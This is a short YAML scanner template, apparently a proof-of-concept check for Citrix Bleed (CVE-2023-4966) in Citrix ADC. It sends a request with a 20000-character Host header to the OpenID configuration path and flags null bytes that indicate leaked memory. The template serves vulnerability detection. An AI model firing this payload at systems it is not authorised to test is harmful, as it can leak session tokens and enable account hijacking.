name: yaml-poc-citrix-application_delivery_controller-leak-CVE-2023-4966
binding: a66ab1ac-3273-4bc3-bd2b-d61f5d683f89
detail:
    author: yuxiang.cai
    links:
        - http://packetstormsecurity.com/files/175323/Citrix-Bleed-Session-Token-Leakage-Proof-Of-Concept.html
        - https://support.citrix.com/article/CTX579459
    vulnerability:
        id: 07c22a95-f35c-434b-9377-978bd0883f27
        level: high
    warning: Harmless
transport: http
set:
    host: randomLowercase(20000)
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /oauth/idp/.well-known/openid-configuration
            headers:
                Connection: close
                Host: '{{host}}'
            follow_redirects: true
        expression: 'response.body_string.contains(''"issuer": '') && response.body.bcontains(b''\x00\x00'')'
expression: r0()
